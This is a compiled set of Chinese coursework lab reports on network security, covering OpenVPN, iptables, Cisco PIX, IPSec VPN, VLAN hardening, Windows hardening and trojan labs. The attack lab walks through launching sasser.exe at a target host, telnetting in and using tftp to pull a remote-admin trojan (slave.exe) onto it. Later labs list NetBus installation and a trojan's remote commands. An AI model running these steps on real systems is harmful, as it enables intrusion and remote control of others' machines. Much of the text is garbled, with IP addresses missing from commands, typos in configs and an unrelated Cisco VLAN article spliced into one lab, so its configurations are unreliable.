网络安全与管理系统设计与架构-实验报告

实验报告课程名称：网络安全与管理系统设计与架构2016年7月3日山东科技大学教务处制实验报告组别姓名同组实验者实验项目名称实验一SSL实验实验日期第8周周二7,8节教师评语实验成绩指导教师实验目的了解SSL是Netscape公司发明的一种用于WEB的安全传输协议。随着时间的推移由于Netscape失去了市场份额，它将SSL的维护工作移交给因特网工程任务组（IETF）。第一个后Netscape版本被重新命名为安全传输层协议（TLS），TLS(TransportLayerSecurity:RFC2246)是基于SSL上研发的，但是与SSLv3.0有细微的差别。二、实验环境

Windows下SSL

VPN的网络拓扑如图3.3.3-1所示，其中：

客户端：本地主机(Windows

XP)，IP地址172.22.1.X

服务端：Windows实验台VPN服务器，IP地址：172.22.X.X/16，内网IP为172.20.X.X/16

二、实验步骤

一、

根据实验拓扑配置环境

根据实验环境中的拓扑图，配置服务器(Windows实验台)与客户端(本地主机)的IP地址。

二、

安装与配置

这一部分是服务端跟客户端都要做的工作，操作完全相同。具体如下：

双击

openvpn-2.0.9.exe进行安装，点击NEXT、I

Agree、NEXT之后开始选择安装路径，手动修改为C:\Program

Files\OpenVPN

。点击

Install

开始安装，安装过程如图3.3.3-2所示；安装过程中，弹出硬件安装窗口，点击仍然继续，安装虚拟网卡。点击

next、Finish

完成安装。

三、

VPN服务器初始化配置

在进行操作之前，首先进行初始化工作：打开命令提示符：“开始|运行”，键入cmd，回车，进入命令提示符；或者“开始|程序|附件|命令提示符”；

进入C:\Program

Files\openvpn\easy-rsa目录下，开始初始化，具体命令如下：

cd

C:\Program

Files\openvpn\easy-rsa

init-config

vars

clean-all

如下图：

上面是初始化工作，以后，在进行证书制作工作时，仍旧需要进行初始化，但只需要进入openvpn\easy-rsa目录，运行vars就可以了，不需要上面那些步骤了。

四、

服务器证书的制作

(1)

生成根证书

输入build-ca.bat，如图所示；

输入build-dh.bat，如图所示。(2)

生成服务端密钥

输入build-key-server

server，生成服务端密钥；生成服务端密钥的过程中，所填写的common

name需要与build-ca中所输入的common

name名称一致，其余的摁空格选择默认或手动输入皆可；具体如图所示。

(3)

生成客户端密钥

输入build-key

client1生成第一个VPN客户端密钥，如图所示；

build-key

client2

//可以继续配置第二个VPN客户端密钥；

生成的密钥存放于C:\Program

Files\openvpn\easy\rsa\keys目录下。

五、

配置服务器

在C:\Program

Files\OpenVPN\easy-rsa\keys目录下，将生成的“ca.crt”、“dh1024.pem”、“server.crt”、“server.key”复制到C:\Program

Files\OPENVPN\KEY目录下（如果没有可以自己创建）,这四个文件是VPN服务端运行所需要的文件。

注：“ca.crt”“dh1024.pem”“server.crt”“server.key”这四个文件是VPN服务端运行所需要的文件。“ca.crt”“client.crt”“client.key”是VPN客户端所需要的文件

在C:\Program

Files\OpenVPN\config目录下创建server.ovpn，服务器端文件(server.ovpn)示例：

local

172.22.1.X

#建立VPN的IP

port

443

#端口号，根据需要，自行修改，如果是用http代理连接，请不要修改

proto

tcp-server

#通过TCP协议连接

dev

tap

#win下必须设为tap

server

#

虚拟局域网网段设置，请根据需要自行修改，不支持和拔号网卡位于同一网段

push

"route

"

#表示client通过VPN

SERVER上网

keepalive

20

180

ca

"C:\\Program

Files\\OPENVPN\\KEY\\ca.crt"

#CA证书存放位置，请根据实际情况自行修改

cert

"C:\\Program

Files\\OPENVPN\\KEY\\server.crt"

#服务器证书存放位置，请根据实际情况自行修改

key

"C:\\Program

Files\\OPENVPN\\KEY\\server.key"

#服务器密钥存放位置，请根据实际情况自行修改

dh

"C:\\Program

Files\\OPENVPN\\KEY\\dh1024.pem"

#dh1024.pem存放位置，请根据实际情况自行修改

push

"redirect-gateway

def1"

push

"dhcp-option

DNS

0"

#DNS，请根据实际情况自行修改

mode

server

tls-server

status

"C:\\Program

Files\\OPENVPN\\log\\openvpn-status.log"

#LOG记录文件存放位置，请根据实际情况自行修改

comp-lzo

verb

4

六、

配置客户端

“ca.crt”“client.crt”“client.key”是VPN客户端所需要的文件，复制到客户端C:\Program

Files\OPENVPN\KEY目录下（如果没有可以自己创建）。

在客户端安装完成之后，需要将

ca.crt

client1.crt

client1.key

这三个文件拷贝到C:\Program

Files\openvpn\key目录下，这三个文件由服务端生成，所以，连接谁的服务器，就需要跟谁索取这三个文件。

然后，编辑一个

client.ovpn的配置文件存放到C:\Program

Files\openvpn\config目录下，客户端就可以进行连接了；客户端文件(client.ovpn)示例：

七、

VPN服务端命令行启动:

Openvpn.exe

"C:\Program

Files\OpenVPN\config\server.ovpn"

//启动VPN到443端口

八、

VPN客户端命令行连接:

Openvpn.exe

"C:\Program

Files\OpenVPN\config\client.ovpn"

九、

VPN安全性验证

上面的配置拔号成功后，VPN

SERVER的IP为172.20.1.Y，VPN

client的IP为172.20.1.Y。

(1)

在VPN

client上ping

VPN

SERVER；

(2)

分别抓取真实网卡与虚拟网卡的数据包作对比。

具体结果如下：

(1)

真实网卡：抓取的为加密ssl数据包(图3.3.3-8为实际环境举例)

。

实验总结需要多练多问多百度实验报告组别16姓名林靖皓同组实验者实验项目名称实验二Linux防火墙实验日期第9周周二7,8节教师评语实验成绩指导教师廉文娟一、实验目的1、了解防火墙的主要类型2、了解和用CLI配置CBAC(IOS有状态的包检查)3、了解和用CLI和SDM配置区域（Zone-Based）策略防火墙二、实验环境1网络中包括两个子网A和B。子网A的网络地址为/24网关为hostA。HostA有两个接口eth0和eth1。Eth0连接子网AIP地址为。eth1连接外部网络Ip地址为1。子网B的网络地址为/24网关为hostB。HostB有两个网络接口eth0和eth1。eth0连接子网B,IP地址为。eth1连接外部网络IP地址为01。hostA和HostB构成子网C,网络地址是/24通过集线器连接到hostC然后通过hostC连接Internet。HostC的内部网络接口为eth0IP地址为。2在hostA、hostB和hostC上都已经安装好Linux系统并且在hostC上已经设置好了Squid代理服务器。实验内容开始配置(1)查看本机关于IPTABLES的设置情况[root@tp~]#iptables-L-n可以看出我在安装linux时,选择了有防火墙,并且开放了22,80,25端口.如果你在安装linux时没有选择启动防火墙,是这样的[root@tp~]#iptables-L-n(2)清除原有规则.不管你在安装linux时是否启动了防火墙,如果你想配置属于自己的防火墙,那就清除现在filter的所有规则.[root@tp~]#iptables-F清除预设表filter中的所有规则链的规则[root@tp~]#iptables-X清除预设表filter中使用者自定链中的规则[root@tp~]#/etc/rc.d/init.d/iptablessave这样就可以写到/etc/sysconfig/iptables文件里了.写入后记得把防火墙重起一下,才能起作用.[root@tp~]#serviceiptablesrestart现在IPTABLES配置表里什么配置都没有了,那我们开始我们的配置吧(3)设定预设规则[root@tp~]#iptables-pINPUTDROP[root@tp~]#iptables-pOUTPUTACCEPT[root@tp~]#iptables-pFORWARDDROP上面的意思是,当超出了IPTABLES里filter表里的两个链规则(INPUT,FORWARD)时,不在这两个规则里的数据包怎么处理呢,那就是DROP(放弃).应该说这样配置是很安全的.我们要控制流入数据包而对于OUTPUT链,也就是流出的包我们不用做太多限制,而是采取ACCEPT,也就是说,不在着个规则里的包怎么办呢,那就是通过.可以看出INPUT,FORWARD两个链采用的是允许什么包通过,而OUTPUT链采用的是不允许什么包通过.(4)添加规则.首先添加INPUT链,INPUT链的默认规则是DROP,所以我们就写需要ACCETP(通过)的链为了能采用远程SSH登陆,我们要开启22端口.[root@tp~]#iptables-AINPUT-ptcp--dport22-jACCEPT[root@tp~]#iptables-AOUTPUT-ptcp--sport22-jACCEPT(注:这个规则,如果你把OUTPUT设置成DROP的就要写上这一部,好多人都是望了写这一部规则导致,始终无法SSH.在远程一下,是不是好了.其他的端口也一样,如果开启了web服务器,OUTPUT设置成DROP的话,同样也要添加一条链:[root@tp~]#iptables-AOUTPUT-ptcp--sport80-jACCEPT,其他同理.)如果做了WEB服务器,开启80端口.[root@tp~]#iptables-AINPUT-ptcp--dport80-jACCEPT如果做了邮件服务器,开启25,110端口.[root@tp~]#iptables-AINPUT-ptcp--dport110-jACCEPT[root@tp~]#iptables-AINPUT-ptcp--dport25-jACCEPT如果做了FTP服务器,开启21端口[root@tp~]#iptables-AINPUT-ptcp--dport21-jACCEPT[root@tp~]#iptables-AINPUT-ptcp--dport20-jACCEPT如果做了DNS服务器,开启53端口[root@tp~]#iptables-AINPUT-ptcp--dport53-jACCEPT如果你还做了其他的服务器,需要开启哪个端口,照写就行了.二,配置一个NAT表放火墙1,查看本机关于NAT的设置情况[root@tprc.d]#iptables-tnat-LChainPREROUTING(policyACCEPT)targetprotoptsourcedestinationChainPOSTROUTING(policyACCEPT)targetprotoptsourcedestinationSNATall--/24anywhereto:35ChainOUTPUT(policyACCEPT)targetprotoptsourcedestination我的NAT已经配置好了的(只是提供最简单的代理上网功能,还没有添加防火墙规则).关于怎么配置NAT,参考我的另一篇文章当然你如果还没有配置NAT的话,你也不用清除规则,因为NAT在默认情况下是什么都没有的如果你想清除,命令是[root@tp~]#iptables-F-tnat[root@tp~]#iptables-X-tnat[root@tp~]#iptables-Z-tnat2,添加规则添加基本的NAT地址转换,(关于如何配置NAT可以看我的另一篇文章),添加规则,我们只添加DROP链.因为默认链全是ACCEPT.防止外网用内网IP欺骗[root@tpsysconfig]#iptables-tnat-APREROUTING-ieth0-s/8-jDROP[root@tpsysconfig]#iptables-tnat-APREROUTING-ieth0-s/12-jDROP[root@tpsysconfig]#iptables-tnat-APREROUTING-ieth0-s/16-jDROP如果我们想,比如阻止MSN,QQ,BT等的话,需要找到它们所用的端口或者IP,(个人认为没有太大必要)例：禁止与53的所有连接[root@tp~]#iptables-tnat-APREROUTING-d53-jDROP禁用FTP(21)端口[root@tp~]#iptables-tnat-APREROUTING-ptcp--dport21-jDROP这样写范围太大了,我们可以更精确的定义.[root@tp~]#iptables-tnat-APREROUTING-ptcp--dport21-d53-jDROP这样只禁用53地址的FTP连接,其他连接还可以.如web(80端口)连接.按照我写的,你只要找到QQ,MSN等其他软件的IP地址,和端口,以及基于什么协议,只要照着写就行了.最后：drop非法连接[root@tp~]#iptables-AINPUT-mstate--stateINVALID-jDROP[root@tp~]#iptables-AOUTPUT-mstate--stateINVALID-jDROP[root@tp~]#iptables-AFORWARD-mstate--stateINVALID-jDROP允许所有已经建立的和相关的连接[root@tp~]#iptables-AINPUT-mstate--stateESTABLISHED,RELATED-jACCEPT[root@tp~]#iptables-AOUTPUT-mstate--stateESTABLISHED,RELATED-jACCEPT[root@tp~]#/etc/rc.d/init.d/iptablessave这样就可以写到/etc/sysconfig/iptables文件里了把防火墙重起一下，起作用。实验总结通过此次防火墙的实验，模拟进行了简单的防火墙的工作，对防火墙的基本工作原理有了认识，加深了对网络传输协议体系的理解，也学习到了对Linux内核扩展的方法。实验报告组别16姓名林靖皓同组实验者实验项目名称实验三思科防火墙配置与入侵检测技术实验日期第10周周二7,8节教师评语实验成绩指导教师廉文娟一、

实验目的

通过该实验了解PIX防火墙的软硬件组成结构，掌握PIX防火墙的工作模式，熟悉PIX防火墙的6条基本指令，掌握PIX防火墙的动态、静态地址映射技术，掌握PIX防火墙的管道配置，熟悉PIX防火墙在小型局域网中的应用。

二、

实验任务

观察PIX防火墙的硬件结构，掌握硬件连线方法

查看PIX防火墙的软件信息，掌握软件的配置模式

了解PIX防火墙的6条基本指令，实现内网主机访问外网主机

三、

实验设备

PIX501防火墙一台，CISCO

2950交换机两台，控制线一根，网络连接线若干，PC机若干

四、

实验拓扑图及内容

图中DMZ区域没有配置，只是配置了内网R1和外网R4，外网R4：

R4#conf

t

Enter

configuration

commands,

one

per

line.

End

with

CNTL/Z.

R4(config)#int

f0/0

R4(config-if)#ip

add

R4(config-if)#no

shut

R4(config-if)#exit

*Mar

1

00:02:56.059:

%LINK-3-UPDOWN:

Interface

FastEthernet0/0,

changed

state

to

up

*Mar

1

00:02:57.059:

%LINEPROTO-5-UPDOWN:

Line

protocol

on

Interface

FastEthernet0/0,

changed

state

to

up

R4(config)#ip

route

R4(config)#

内网R1：

R1#conf

t

Enter

configuration

commands,

one

per

line.

End

with

CNTL/Z.

R1(config)#int

f0/0

R1(config-if)#ip

add

R1(config-if)#no

shut

R1(config-if)#

*Mar

1

00:01:32.115:

%LINK-3-UPDOWN:

Interface

FastEthernet0/0,

changed

state

to

up

*Mar

1

00:01:33.115:

%LINEPROTO-5-UPDOWN:

Line

protocol

on

Interface

FastEthernet0/0,

changed

state

to

upR1(config-if)#exit

R1(config)#ip

route

R1(config)#exit

R1#

*Mar

1

00:53:05.287:

%SYS-5-CONFIG_I:

Configured

from

console

by

console

R1#

防火墙上的配置：

pixfirewall#

conf

t

pixfirewall(config)#

hostname

pix

pix(config)#

pix(config)#

pix(config)#

int

e0

pix(config-if)#

ip

add

pix(config-if)#

nameif

inside

INFO:

Security

level

for

"inside"

set

to

100

by

default.

pix(config-if)#

no

shut

pix(config-if)#

exit

pix(config)#

int

e1

pix(config-if)#

nameif

outside

INFO:

Security

level

for

"outside"

set

to

0

by

default.

pix(config-if)#

ip

add

pix(config-if)#

ip

add

pix(config-if)#

no

shut

pix(config-if)#

exit

pix(config)#

static

(inside,outside)

netmask

55

pix(config)#

access-list

100

permit

icmp

any

any

pix(config)#

access-gr

pix(config)#

access-group

100

in

int

pix(config)#

access-group

100

in

interface

outside

pix(config)#

exit

pix#

五、实验结果

内网ping外网：

外网ping内网：五、实验总结：pix防火墙默认情况下，从高安全级别到低安全级别的流量是被允许的，从低安全级别访问高安全级别的流量默认是被禁止的。要使流量可以从低安全级别访问高安全级别，需要使用访问列表。实验报告组别16姓名林靖皓同组实验者实验项目名称实验四VPN配置实验日期第11周周二7,8节教师评语实验成绩指导教师廉文娟一、实验目的：

掌握IKE阶段1和阶段2的协商过程

在cisco路由器上配置IPSec

VPN二、实验步骤：

实验拓扑图：1）R1配置

en

conf

t

hos

r1

int

fa0/0

ip

ad

52

no

sh

int

fa1/0

ip

ad

no

sh

exit

ip

route

//阶段1配置

//交换ISAKMP/IKE传输集

crypto

isakmp

policy

1

//建立ISAKMP/IKE的管理连接策略encryption

3des

//指定管理连接的最后两个报文（用于身份验证）采用3des加密算法

hash

md5

//指定验证过程采用HMAC（散列消息验证码）功能

group

2

//指定DH密钥组，生成对称的密钥DH算法

authentication

pre-share

//指定设备验证的类型为：预共享密钥

lifetime

secondes

86400

//配置管理连接的生存周期

exit

//通过DH算法实现密钥交换

crypto

isakmp

key

6

benet

address

//阶段2配置

//配置

crypto

ACL（定义触发VPN流量的ACL）

access-list

100

permit

ip

55

55

//定义阶段2的传输集

crypto

ipsec

transform-set

r1r2

ah-sha-hmac

esp-aes

exit

//配置crypto

map

crypto

map

r1r2map

1

ipsec-isakmp

match

addess

100

set

peer

set

transform-set

r1r2

int

fa0/0

//将crypto

mpa

应用到接口

crypto

map

r1r2map

2）R2配置

en

conf

t

hos

r2

int

fa0/0

ip

ad

52

no

sh

int

fa1/0

ip

ad

52

no

sh

exit

3）R3配置

en

conf

t

hos

r3

int

fa0/0

ip

ad

no

shint

fa1/0

ip

ad

52

no

sh

exit

ip

route

//阶段1配置

//交换ISAKMP/IKE传输集

crypto

isakmp

policy

1

encryption

3des

hash

md5

//设备身份验证

authentication

pre-share

group

2

exit

//通过DH算法实现密钥交换

crypto

isakmp

key

6

benet

address

//阶段2配置

//配置

crypto

ACL（定义触发VPN流量的ACL）

access-list

100

permit

ip

55

55

//定义阶段2的传输集

crypto

ipsec

transfrom-set

r2r1

ah-sha-hmac

esp-aes

exit

//配置crypto

map

crypto

map

r2r1map

1

ipsec-isakmp

set

peer

set

transform-set

r2r1

match

address

100

int

fa1/0

//将crypto

mpa

应用到接口

crypto

map

r2r1map

end

1）验证

1.在R1上采用扩展ping

source

来触发VPN流量，使用show

crypto

isakmp

policy

查看策略是否匹配！

2．使用show

crypto

is

key

查看密钥是否一至

3．使用show

crypto

isakmp

sa

查看是否建立管理连接，如图所示：已建立管理连接，4．使用show

crypto

ipsec

sa

查看第二阶段的数据连接是否已建立，如图所示：已建立数据连接，且数据已被加密。实验总结由于所选择的VPN的IP地址无效，所以不能通过其正常上网。但是基本上步骤都已明白，并清楚了解配置VPN连接的基本步骤。实验报告组别16姓名林靖皓同组实验者实验项目名称实验五保护局域网（二层安全）实验日期第12周周二7,8节教师评语实验成绩指导教师廉文娟一、实验目的：AP通过二层交换机和AC相连，使用AP自动上线的方式，并与PC相通。二、实验内容：配置思路

（1）配置接入交换机和AC，实现AP和AC互通；

（2）配置AC的基本功能，包括配置AC运营商标识和ID、AC与AP之间通信的源接口，实现AC作为DHCP

Server给STA和AP分配IP地址；

（3）配置AP上线的认证方式，并把AP加入AP域中，实现AP正常工作；

（4)配置VAP，下发WLAN业务，实现STA访问WLAN网络功能；

（5）配置AP对应的WMM模板、射频模板，并在射频口下绑定射频模板，实现STA与AP之间的无线通信参数配置；

（6）配置WLAN-ESS接口，并在服务集下绑定该接口，实现无线侧报文到达AC后能够送至WLAN业务处理模块处理；

（7）配置AP对应的服务集、安全模板和流量模板，并在服务集下绑定安全模板、流量模板、WLAN-ESS接口，实现STA接入网络安全策略及QoS控制；

（8）配置VAP并下发，实现STA访问WLAN网络功能。

AC代码为：

配置AC上接口，透传管理和业务VLAN。

独立的安全调研公司@stake[9]最近对CiscoCatalyst2950、Catalyst3550、Catalyst4500和Catalyst6500系列交换机上采用的虚拟LAN（VLAN）技术进行了一次安全检查[1]。虽然此次检查没有暴露出严重的安全漏洞，但必须指出的是，如果交换机的配置不正确或不适当，则很有可能引发意外行为或发生安全问题。去年，思科系统公司一直致力于在若干文档中制定安全网络配置的最佳实践准则，例如《SAFE蓝图》[2]或《Catalyst4500、5000和6500系列交换机最佳实践经验》[3]。但是，迄今为止，思科还没有提供一本全面介绍与VLAN相关的所有最佳实践经验、可方便客户和现场工程师参考的文档。本文的目的是全面介绍思科工程师多年积累的丰富经验和建议，帮助客户和现场工程师正确地在思科交换机上配置VLAN。除此以外，本文还将通过要点说明解释@stake测试的主要结果，阐述解决安全问题的方法。基本安全准则要想创建安全的交换网，必须先熟悉基本安全准则。需要特别注意的是，SAFE最佳实践[2]中强调的基本准则是设计任何安全交换网的基石。如果用户不希望任何设备受损，则必须严格控制对该设备的访问。不仅如此，所有网络管理员都应该使用思科平台上提供的所有实用安全工具，包括系统密码的基本配置、IP准入过滤器和登陆检查，以及RADIUS、TACACS+、Kerberos、SSH、SNMPv3、IDS等更先进的工具（详情参见[3]）。必须使所有基本安全准则得到满足之后，再关注更先进的安全细节。在下面的章节中，我们将说明与VLAN相关的问题。虚拟

LAN第二层（L2）交换机指能够将若干端口组成虚拟广播域，且各虚拟广播域之间相互隔离的设备。这些域一般称为虚拟LAN（VLAN）。VLAN的概念与网络领域中的其它概念相似，流量由标记或标签标识。标识对第二层设备非常重要，只有标识正确，才能隔离端口并正确转发接收到的流量。正如后面章节中将要介绍的那样，缺乏标识有时是引发安全问题的原因，因而需要避免。如果设备中的所有分组与相应VLAN标记紧密结合，则能够可靠区分不同域的流量。这就是VLAN交换体系结构的基本前提。此时，我们可以得出这样的结论：如果从源节点发送出去之后，分组的VLAN标识不能被修改，即保持端到端不变，则VLAN的可靠性应等价于物理安全性。关于这个问题，我们还将在下面详细讨论。控制面板恶意用户特别希望能够访问网络设备的管理控制台，因为一旦成功，就能够容易地根据他们的需要修改网络配置。在基于VLAN的交换机中，除与带外端口直接连接外，管理CPU还可以使用一个或多个VLAN执行带内管理。另外，它还可以使用一个或多个VLAN与其它网络设备交换协议流量。基本物理安全准则要求网络设备位于可控（锁定）空间，主要VLAN安全准则则要求将带内管理和协议流量限制在可控环境中。这个要求可以通过以下工具和最佳实践经验实现：•

流量和协议ACL或过滤器•

QoS标记和优先级划分（控制协议由相应的服务等级或DSCP值区分）•

有选择地关闭不可信端口上的第二层协议（例如关闭接入端口上的DTP）•

只在专用VLAN上配置带内管理端口•

避免使用VLAN1传输任何数据流量命令示例：Catalyst操作系统（CatOS）软件CiscoIOSò软件使用

VLAN1

需注意的事项VLAN1成为特殊VLAN的原因是，需要第二层设备才能由默认VLAN分配其端口，包括其管理端口。另外，CDP、PAgP和VTP等许多第二层协议都需要发送到干线链路上的特定VLAN。基于这三个原因，最后选中了VLAN1。为挽回VLAN1的声誉，可实施一个简单的通用安全准则：作为一项安全规定，网络管理员应该将任何VLAN，尤其是VLAN1与并非绝对需要此VLAN的所有端口隔离开。因此，对于VLAN1，上述准则可以转换成以下建议：•

不使用VLAN1传输带内管理流量，使用另一专用VLAN，将管理流量与用户数据和协议流量隔离开；•

撤销VLAN1中所有不需要的干线和接入端口（包括未连接端口和关闭端口）。同样，上述规则也适用于管理VLAN读操作：•

不在不需要的任何干线或接入端口上配置管理VLAN（包括未连接端口和关闭端口）；实验报告组别16姓名林靖皓同组实验者实验项目名称实验六网络攻击实验日期第13周周二7,8节教师评语实验成绩指导教师张重庆一、实验目的：了解并掌握攻击的的防御及攻击二、实验内容：1.

使用网络安全漏洞扫描程序发现网络安全漏洞

a)

使用Retina

Sasser

扫描程序发现震荡波漏洞。b)

使用震荡波攻击程序（sasser.exe）攻击主机。命令的语法是：

sasser

<操作系统类型>

<目标IP地址>

<端口号>

c)

使用sasser.exe攻击目标.

d)

使用telnet命令连接到目标机。命令为：

telnet

<目标ip

地址>

<端口号>

e)

安装远程管理工具RA或木马程序

1.

使用tftp

命令下载程序到目标机.

使用tftp命令需安装tftp服务器软件.

2.

在目标机上运行tftp

命令下载RA服务器端.命令是：

tftp

–i

get

<TFTP服务器地址>

slave.exe3.

安装RA(运行slave.exe)

f)

使用RA控制目标机（密码为trial）G）使用PEExplorer对PE文件进行查看PE病毒的实现实验报告组别16姓名林靖皓同组实验者实验项目名称实验七Windows安全防御实验日期第14周周二7,8节教师评语实验成绩指导教师张重庆一、实验目的

掌握windows的安全设置，加固操作系统安全

二、实验内容

账户与密码的安全设置

文件系统的保护和加密

启用

安全策略与安全模板

审核与日志查看

5、利用

MBSA

检查和配置系统安全

三、实验环境

1）

硬件

PC机一台。

2、系统配置：操作系统windows

XP专业版。

四、实验步骤

任务一

账户和密码的安全设置

1、删除不再使用的账户，禁用

guest

账户

⑴

检查和删除不必要的账户

右键单击“开始”按钮，打开“资源管理器”，选择“控制面板”中的“用户和密码”项；

在弹出的对话框中中列出了系统的所有账户。确认各账户是否仍在使用，删除其中不用的账户。

⑵

禁用

guest

账户

打开“控制面板”中的“管理工具”，选中“计算机管理”中“本地用户和组”，打开“用户”，右键单击

guest

账户，在弹出的对话框中选择“属性”，在弹出的对话框中“帐户已停用”一栏前打勾。

确定后，观察

guest

前的图标变化，并再次试用

guest

用户登陆，记录显示的信息。

２、启用账户策略

⑴

设置密码策略

打开“控制面板”中的“管理工具”，在“本地安全策略”中选择“账户策略”；双击“密码策略”，在右窗口中，双击其中每一项，可按照需要改变密码特性的设置。根据选择的安全策略，尝试对用户的密码进行修改以验证策略是否设置成功，记录下密码策略和观察到的实验结果。⑵

设置账户锁定策略

打开“控制面板”中的“管理工具”，在“本地安全策略”中选择“账户策略”。双击“帐户锁定策略”。

在右窗口中双击“账户锁定阀值”，在弹出的对话框中设置账户被锁定之前经过的无效登陆次数（如

3

次），以便防范攻击者利用管理员身份登陆后无限次的猜测账户的密码。

在右窗口中双击“账户锁定时间”，在弹出的对话框中设置账户被锁定的时间（如

20

min

）。

重启计算机，进行无效的登陆（如密码错误），当次数超过

3

次时，记录系统锁定该账户的时间，并与先前对“账户锁定时间”项的设置进行对比。

３．开机时设置为“不自动显示上次登陆账户”

右键单击“开始”按钮，打开“资源管理器”，选中“控制面板”，打开“管理工具”选项，双击“本地安全策略”项，选择“本地策略”中的“安全选项”，并在弹出的窗口右侧列表中选择“登陆屏幕上不要显示上次登陆的用户名”选项，启用该设置。设置完毕后，重启机器看设置是否生效。

４．禁止枚举账户名

右键单击“开始”按钮，打开“资源管理器”，选中“控制面板”，打开“管理工具”选项，双击“本地安全策略”项，选择“本地策略”中的“安全选项”，

并在弹出的窗口右侧列表中选择“对匿名连接的额外限制”项，在“本地策略设置”中选择“不允许枚举

SAM

账户和共享”。

此外，在“安全选项”中还有多项增强系统安全的选项，请同学们自行查看。

任务二

文件系统安全设置

⑴

打开采用

NTFS

格式的磁盘，选择一个需要设置用户权限的文件夹。⑵

右键单击该文件夹，选择“属性”，在工具栏中选择“安全”。

⑶

将“允许来自父系的可能继承权限无限传播给该对象”之前的勾去掉，以去掉来自父系文件夹的继承权限（如不去掉则无法删除可对父系文件夹操作用户组的操作权限）。

⑷

选中列表中的

Everyone

组，单击“删除”按钮，删除

Everyone

组的操作权限，由于新建的用户往往都归属于

Everyone

组，而

Everyone

组在缺省情况下对所有系统驱动器都有完全控制权，删除

Everyone

组的操作权限可以对新建用户的权限进行限制，原则上只保留允许访问此文件夹的用户和用户组。

⑸

选择相应的用户组，在对应的复选框中打勾，设置其余用户组对该文件夹的操作权限。

⑹

单击“高级”按钮，在弹出的窗口中，查看各用户组的权限。

⑺

注销计算机，用不同的用户登陆，查看

刚才设置“桌面”文件夹的访问权限，将结果记录在实验报告中。

任务三

启用审核与日志查看1

．启用审核策略

打开“控制面板”中的“管理工具”，选择“本地安全策略”。

(2)

打开“本地策略”中的“审核策略”，在实验报告中记录当前系统的审核策略。

(3)

双击每项策略可以选择是否启用该项策略，例如“审核账户管理”将对每次建立新用户、删除用户等操作进行记录，“审核登陆事件”将对每次用户的登陆进行记录；“审核过程追踪”将对每次启动或者退出的程序或者进程进行记录，根据需要启用相关审核策略，审核策略启用后，审核结果放在各种事件日志中。

2

．查看事件日志

打开“控制面板”中的“管理工具”，双击“事件查看器“，在弹出的窗口中查看系统的

3

种日志。

双击“安全日志”，可查看有效无效、登陆尝试等安全事件的具体记录，例如：查看用户登陆

/

注销的日志。

任务四

启用安全策略与安全模块

1、启用安全模板

开始前，请记录当前系统的账户策略和审核日志状态，以便于同实验后的设置进行比较。

⑴

单击“开始”按钮，选择“运行”按钮，在对话框中运行

mmc

，打开系统控制台

⑵

单击工具栏上“控制台”，在弹出的菜单中选择“添加

/

删除管理单元”，单击“添加”，在弹出的窗口中分别选择“安全模板”、“安全设置和分析”，单击“添加”按钮后，关闭窗口，并单击“确定”按钮。

⑶

此时系统控制台中根节点下添加了“安全模板”、“安全设置分析”两个文件夹，打开“安全模板”文件夹，可以看到系统中存在的安全模板。右键单击模板名称，选择“设置描述”，可以看到该模板的相关信息。选择“打开”，右侧窗口出现该模板的安全策略，双击每种安全策略可看到其相关配置。

⑷

右键单击“安全设置与分析”，选择“打开数据库”。在弹出的对话框中输入预建安全数据库的名称，例如起名为

mycomputer.sdb

，单击“打开”按钮，在弹出的窗口中，根据计算机准备配置成的安全级别，选择一个安全模板将其导入。

⑸

右键单击“安全设置与分析”，选择“立即分析计算机”，单击“确定”按钮，系统开始按照上一步中选定的安全模板，对当前系统的安全设置是否符合要求进行分析。将分析结果记录在实验报告中。

⑹

右键单击“安全设置与分析”，选择“立即配置计算机”，则按照第（

4

）步中所选的安全模板的要求对当前系统进行配置。

⑺

在实验报告中记录实验前系统的缺省配置，接着记录启用安全模板后系统的安全设置，记录下比较和分析的结果。2

．建安全模板

⑴

单击“开始”按钮，选择“运行”按钮，在对话框中运行

mmc

，打开系统控制台。

⑵

单击工具栏上“控制台”，在弹出的菜单中选择“添加

/

删除管理单元”，单击“添加”，在弹出的窗口中分别选择“安全模板”、“安全设置和分析”，单击“添加”按钮后，关闭窗口，并单击“确定”按钮。

⑶

此时系统控制台中根节点下添加了“安全模板”、“安全设置分析”两个文件夹，打开“安全模板”文件夹，可以看到系统中存在的安全模板。右键单击模板名称，选择“设置描述”，可以看到该模板的相关信息。选择“打开”，右侧窗口出现该模板的安全策略，双击每中安全策略可看到其相关配置。

⑷

右键单击“安全设置与分析”，选择“打开数据库”。在弹出的对话框中输入预建安全数据库的名称，例如起名为

mycomputer.sdb

，单击“打开”按钮，在弹出的窗口中，根据计算机准备配置成的安全级别，选择一个安全模板将其导入。

⑸

展开“安全模板”，右键单击模板所在路经

,

选择“新加模板”，在弹出的对话框中添如预加入的模板名称

mytem

，在“安全模板描述“中填入“自设模板”。查看新加模板是否出现在模板列表中。

⑹

双击

mytem

，在现实的安全策略列表中双击“账户策略”下的“密码策略”，可发现其中任一项均显示“没有定义”，双击预设置的安全策略（如“密码长度最小值”），弹出窗口。

⑺

在“在模板中定义这个策略设置”前打勾，在框中填如密码的最小长度为

7

。

⑻

依次设定“账户策略”、“本地策略”等项目中的每项安全策略，直至完成安全模板的设置。实验报告组别16姓名林靖皓同组实验者实验项目名称网络攻击——恶意代码实验日期第15周周二7,8节教师评语实验成绩指导教师张重庆一、实验目的练习木马程序安装和攻击过程，了解木马攻击原理，掌握手工查杀木马的基本方法，提高自己的安全意识。

二、实验内容

安装木马程序NetBus，通过冰刃iceberg、autoruns.exe了解木马的加载及隐藏技术

三、实验步骤

木马安装和使用实验报告组别16姓名林靖皓同组实验者实验项目名称实验九木马实验实验日期第16周周二7,8节教师评语实验成绩指导教师张重庆一、实验目的

掌握木马病毒的基本原理。

二、实验原理

用木马程序进行网络入侵，从过程上看大致可分为六步：配置木马(实现伪装和信息

反馈)、传播木马(通过

E.mail、病毒和软件等)、运行木马、信息获取、建立连接和远程

控制(实现对受害者的控制)三、预备知识

首先要选择熟悉的编程工具，本实验选用

VC++为编程语言。

以

CSocket

为基类生成进行服务器和控制端的通信，因此需要了解基于

Socket

的

编程原理。

四、实验内容

实验内容主要包括程序编译、程序演示两个部分。

（1）程序编译

在

VC++6.0

环境下编译客户端和服务器端程序。

（2）程序演示

首先启动服务器端（被控制端），然后启动客户端（控制端），在控制端输入命令

来控制被控制端。本实验支持的命令参考表

4.1。

试验程序支持的命令列表

命令

命令含义

CMD

执行应用程序

!SHUT

退出木马

FILEGET

获得远端文件

EDTTCONF

编辑配置文件

LIST

列目录

VIEW

查看文件内容

REBOOT

重启计算机

五、

实验环境

●

VMWare

5.5.3

●Windows

